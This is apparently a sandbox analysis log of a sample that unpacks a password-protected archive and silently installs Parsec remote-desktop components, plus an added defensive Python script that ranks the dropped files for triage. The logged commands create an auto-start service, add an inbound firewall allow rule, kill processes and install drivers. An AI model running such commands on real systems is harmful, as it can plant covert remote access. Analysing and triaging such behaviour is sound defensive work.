Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\parsecd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PSU9B.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-U20SU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)Jump to dropped file
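The dropped-file list above is long and flat, and the order is the order the sandbox logged it, not the order a responder reads it in. The following added example (not code from the Joe Sandbox report nor from Parsec or any other product the report names) parses a constructed subset of these entries, copied in the flattened form the page shows, and ranks them: kernel drivers (.sys) first, then executables parked in the user profile, then Inno Setup (is-XXXXX.tmp) and NSIS (nsXXXXX.tmp\*.dll) staging files. Several PSecWin files carry names that also exist in System32 (TpmTool.exe, runonce.exe, mcbuilder.exe, ws2help.dll); the report does not say whether they are byte-identical copies, so the example only marks them for a hash comparison against the local System32 file. The SYSTEM32_NAMES set, the category and priority names and all function names are this example's assumptions.

```python
"""Rank the "Dropped PE file which has not been started" entries of a sandbox report.

Added example: not code from the Joe Sandbox report nor from any product it names.
SAMPLE_LINES is a constructed subset of this report's entries, copied in the
flattened form the page shows; the categories, PRIORITY, SYSTEM32_NAMES and all
function names are this example's own assumptions.
"""
import re
from collections import Counter

SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)Jump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmpJump to dropped file",
    r"Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy)Jump to dropped file",
    r"Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\parsecd.exeJump to dropped file",
    r"Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.sys (copy)Jump to dropped file",
    r"Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEC5.tmpJump to dropped file",
    r"Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dllJump to dropped file",
    r"Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sysJump to dropped file",
    r"Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)Jump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)Jump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)Jump to dropped file",
]

# Constructed, deliberately tiny stand-in for "file names that ship in
# %SystemRoot%\System32". A real check enumerates that directory and compares
# hashes, because a matching name proves nothing either way.
SYSTEM32_NAMES = {"tpmtool.exe", "runonce.exe", "mcbuilder.exe", "ws2help.dll", "kbd101b.dll"}

# Tolerates both the fused form ("...tmpDropped PE file...") and a "src | Dropped..." form.
ENTRY_RX = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*Dropped PE file which has not been started:\s*"
    r"(?P<path>.+?)\s*(?P<copy>\(copy\))?\s*(?:Jump to dropped file)?\s*$"
)
INNO_STAGING = re.compile(r"^is-[a-z0-9]{5}\.tmp$")           # Inno Setup pre-rename copies
NSIS_PLUGIN_DIR = re.compile(r"\\ns[a-z][0-9a-f]{4}\.tmp\\[^\\]+$")  # NSIS plugin scratch dir

PRIORITY = {"kernel-driver": 1, "user-profile-pe": 2, "driver-store": 3,
            "program-files": 4, "nsis-plugin": 5, "inno-setup-staging": 6, "other": 7}


def categorize(path):
    low = path.lower()
    name = low.rsplit("\\", 1)[-1]
    if name.endswith(".sys"):
        return "kernel-driver"        # ring 0 once the INF is processed
    if INNO_STAGING.match(name):
        return "inno-setup-staging"
    if NSIS_PLUGIN_DIR.search(low):
        return "nsis-plugin"
    if "\\driverstore\\" in low:
        return "driver-store"
    if "\\appdata\\" in low:
        return "user-profile-pe"      # executable code in a user-writable path
    if low.startswith("c:\\program files"):
        return "program-files"
    return "other"


def parse_entry(line):
    m = ENTRY_RX.match(line)
    if not m:
        return None
    path = m.group("path")
    cat = categorize(path)
    name = path.rsplit("\\", 1)[-1].lower()
    return {
        "dropper": m.group("src").rsplit("\\", 1)[-1],
        "path": path,
        "category": cat,
        "copy": bool(m.group("copy")),
        # User-profile PE with a System32 file name: schedule a hash comparison.
        "system32_name": cat == "user-profile-pe" and name in SYSTEM32_NAMES,
    }


def triage(lines):
    entries = [e for e in map(parse_entry, lines) if e]
    entries.sort(key=lambda e: (PRIORITY[e["category"]], not e["system32_name"], e["path"].lower()))
    return entries


def summarize(entries):
    return Counter(e["category"] for e in entries)


def by_dropper(entries):
    return Counter(e["dropper"] for e in entries)


if __name__ == "__main__":
    ranked = triage(SAMPLE_LINES)
    for e in ranked:
        flag = "  [System32 name: hash-compare]" if e["system32_name"] else ""
        print(f'{e["category"]:<20} {e["dropper"]:<20} {e["path"]}{flag}')
    print(summarize(ranked), by_dropper(ranked))
```

Feeding the whole list above through the same parser gives the reading order a responder actually wants: the three .sys files and the DriverStore staging copies first, then the PSecWin executables that need a hash check, with the dozens of is-*.tmp and NSIS plugin files at the bottom.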
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | API coverage: 5.1 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | API coverage: 5.5 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | API coverage: 7.0 %
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | API coverage: 8.8 %
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp TID: 6160 | Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Parsec\pservice.exe TID: 2828 | Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe TID: 2472 | Thread sleep count: 66 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (17 identical entries)
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function 5_2_00418318: FindFirstFileW, FindFirstFileW, free
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function 12_2_00405C49: GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function 12_2_00406873: FindFirstFileW, FindClose
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function 12_2_0040290B: FindFirstFileW
Source: C:\Program Files\Parsec\pservice.exe | Code function 40_2_00007FF7EC03A89C: FindFirstFileExW
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function 46_2_00405C49: GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function 46_2_00406873: FindFirstFileW, FindClose
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function 46_2_0040290B: FindFirstFileW
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function 49_2_00007FF763C58EE4: FindFirstFileExW
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function 52_2_00007FF694BC85E4: FindFirstFileExW
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function 66_2_00405C49: GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function 66_2_00406873: FindFirstFileW, FindClose
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function 66_2_0040290B: FindFirstFileW
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function 72_2_00007FF6750F85E4: FindFirstFileExW
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function 5_2_00419414: free, free, GetLogicalDriveStringsW, GetLogicalDriveStringsW, free, free, free
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function 5_2_0041C7DC: GetSystemInfo
Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A62000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000003.1956522073.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743067359.0000019890041000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3336997303.0000019890047000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WindowsAzure Stack HCIHyper-V ServerWe were expecting an Os, Build and Service Pack field but we didn't get one
Source: wscript.exe, 00000029.00000003.2004424792.0000000003116000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: onecore\base\ngscb\tpmhli\lib\pcrs.cppAMDAtmelATMLBroadcomBRCMCiscoCSCOFlySliceFLYSGoogleGOOGHPEIBMInfineonIFXIntelINTCLenovoLENMicrochipMCHPMicrosoftMSFTNational SemiconductorNSM NationzNTZNuvoton TechnologyNTCQualcommQCOMFuzhou RockchipROCCSMSCST MicroelectronicsSTM SamsungSMSNSinosunSNSTexas InstrumentTXNVMWareVMWWinbondWECTPM_PT_FAMILY_INDICATORTPM_PT_LEVELTPM_PT_REVISIONTPM_PT_DAY_OF_YEARTPM_PT_YEARTPM_PT_MANUFACTURERTPM_PT_VENDOR_STRING_1TPM_PT_VENDOR_STRING_2TPM_PT_VENDOR_STRING_3TPM_PT_VENDOR_STRING_4TPM_PT_VENDOR_TPM_TYPETPM_PT_FIRMWARE_VERSION_1TPM_PT_FIRMWARE_VERSION_2TPM_PT_INPUT_BUFFERTPM_PT_HR_TRANSIENT_MINTPM_PT_HR_PERSISTENT_MINTPM_PT_HR_LOADED_MINTPM_PT_ACTIVE_SESSIONS_MAXTPM_PT_PCR_COUNTTPM_PT_PCR_SELECT_MINTPM_PT_CONTEXT_GAP_MAXTPM_PT_NV_COUNTERS_MAXTPM_PT_NV_INDEX_MAXTPM_PT_MEMORYTPM_PT_CLOCK_UPDATETPM_PT_CONTEXT_HASHTPM_PT_CONTEXT_SYMTPM_PT_CONTEXT_SYM_SIZETPM_PT_ORDERLY_COUNTTPM_PT_MAX_COMMAND_SIZETPM_PT_MAX_RESPONSE_SIZETPM_PT_MAX_DIGESTTPM_PT_MAX_OBJECT_CONTEXTTPM_PT_MAX_SESSION_CONTEXTTPM_PT_PS_FAMILY_INDICATORTPM_PT_PS_LEVELTPM_PT_PS_REVISIONTPM_PT_PS_DAY_OF_YEARTPM_PT_PS_YEARTPM_PT_SPLIT_MAXTPM_PT_TOTAL_COMMANDSTPM_PT_LIBRARY_COMMANDSTPM_PT_VENDOR_COMMANDSTPM_PT_NV_BUFFER_MAXTPM_PT_MODESTPM_PT_MAX_CAP_BUFFERTPM_PT_PERMANENTTPM_PT_STARTUP_CLEARTPM_PT_HR_NV_INDEXTPM_PT_HR_LOADEDTPM_PT_HR_LOADED_AVAILTPM_PT_HR_ACTIVETPM_PT_HR_ACTIVE_AVAILTPM_PT_HR_TRANSIENT_AVAILTPM_PT_HR_PERSISTENTTPM_PT_HR_PERSISTENT_AVAILTPM_PT_NV_COUNTERSTPM_PT_NV_COUNTERS_AVAILTPM_PT_ALGORITHM_SETTPM_PT_LOADED_CURVESTPM_PT_LOCKOUT_COUNTERTPM_PT_MAX_AUTH_FAILTPM_PT_LOCKOUT_INTERVALTPM_PT_LOCKOUT_RECOVERYTPM_PT_NV_WRITE_RECOVERYTPM_PT_AUDIT_COUNTER_0TPM_PT_AUDIT_COUNTER_1TPM_HT_PCRTPM_HT_NV_INDEXTPM_HT_HMAC_SESSIONTPM_HT_LOADED_SESSIONTPM_HT_POLICY_SESSIONTPM_HT_SAVED_SESSIONTPM_HT_PERMANENTTPM_HT_TRANSIENTTPM_HT_PERSISTENTTPM_RH_FIRSTTPM_RH_SRKTPM_RH_OWNERTPM_RH_REVOKETPM_RH_TRANSPORTTPM_RH_OPERATORTPM_RH_ADMINTPM_RH_EKTPM_RH_NULLTPM_RH_UNASSIGNEDTPM_RH_PWTPM_RH_LOCKOUTTPM_RH_ENDORSEMENTTPM_RH_PLATFORMTPM_RH_PLATFORM_NVTPM_RH_AUTH_00TPM_RH_AUTH_FFTPM_RH_LASTTPM_INTEL_PROP_INTC_FLAGSTPM_ALG_RSATPM_ALG_SHA1TPM_ALG_HMACTPM_ALG_AESTPM_ALG_MGF1TPM_ALG_KEYEDHASHTPM_ALG_XORTPM_ALG_SHA256TPM_ALG_SHA384TPM_ALG_SHA512TPM_ALG_NULLTPM_ALG_SM3_256TPM_ALG_SM4TPM_ALG_RSASSATPM_ALG_RSAESTPM_ALG_RSAPSSTPM_ALG_OAEPTPM_ALG_ECDSATPM_ALG_ECDHTPM_ALG_KDF1_SP800_108TPM_ALG_ECCTPM_ALG_SYMCIPHERTPM_ALG_SHA3_256TPM_ALG_SHA3_384TPM_ALG_SHA3_512TPM_ALG_CTRTPM_ALG_OFBTPM_ALG_CBCTPM_ALG_CFBTPM_ALG_ECBTPM2_NV_UndefineSpaceSpecialTPM2_EvictControlTPM2_HierarchyControlTPM2_NV_UndefineSpaceTPM2_ChangeEPSTPM2_ChangePPSTPM2_ClearTPM2_ClearControlTPM2_ClockSetTPM2_HierarchyChangeAuthTPM2_NV_DefineSpaceTPM2_PCR_AllocateTPM2_PCR_SetAuthPolicyTPM2_PP_CommandsTPM2_SetPrimaryPolicyTPM2_FieldUpgradeStartTPM2_ClockRateAdjustTPM2_CreatePrimaryTPM2_NV_GlobalWriteLockTPM2_GetCommandAuditDigestTPM2_NV_IncrementTPM2_NV_SetBitsTPM2_NV_ExtendTPM2_NV_WriteTPM2_NV_WriteLockTPM2_DictionaryAttackLockResetT
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | API call chain: ExitProcess graph end node (graph_12-3589)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | API call chain: ExitProcess graph end node
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp | Process information queried: ProcessInformation
Source: C:\Program Files\Parsec\pservice.exe | Code function 40_2_00007FF7EC0370C8: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function 5_2_00466550: GetCurrentProcess, GetProcessTimes, memset, GetModuleHandleW, GetProcAddress, LoadLibraryW, GetProcAddress, GetCurrentProcess, GetProcAddress, GetCurrentProcess, fputs, fputs, fputs, fputs
Source: C:\Program Files\Parsec\pservice.exe | Code function 40_2_00007FF7EC030D20: GetProcessHeap
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Program Files\Parsec\pservice.exe | Code function 40_2_00007FF7EC036D74: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Program Files\Parsec\pservice.exe | Code function 40_2_00007FF7EC037274: SetUnhandledExceptionFilter
Source: C:\Program Files\Parsec\pservice.exe | Code function 40_2_00007FF7EC0370C8: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec\pservice.exe | Code function 40_2_00007FF7EC02B0C4: RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function 49_2_00007FF763C374A4: SetUnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function 49_2_00007FF763C372FC: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function 49_2_00007FF763C418AC: RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function 49_2_00007FF763C37050: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function 52_2_00007FF694BA6840: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function 52_2_00007FF694BB10DC: RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function 52_2_00007FF694BA6AEC: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function 52_2_00007FF694BA6CD0: SetUnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function 72_2_00007FF6750D6840: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function 72_2_00007FF6750E10DC: RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function 72_2_00007FF6750D6AEC: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function 72_2_00007FF6750D6CD0: SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\runonce.exe | Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exeJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015c" "winsta0\default" "0000000000000174" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015c" "winsta0\default" "00000000000000f4" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015c" "winsta0\default" "0000000000000174" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015c" "winsta0\default" "00000000000000f4" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC022130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus, 40_2_00007FF7EC022130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0046E460 cpuid 5_2_0046E460
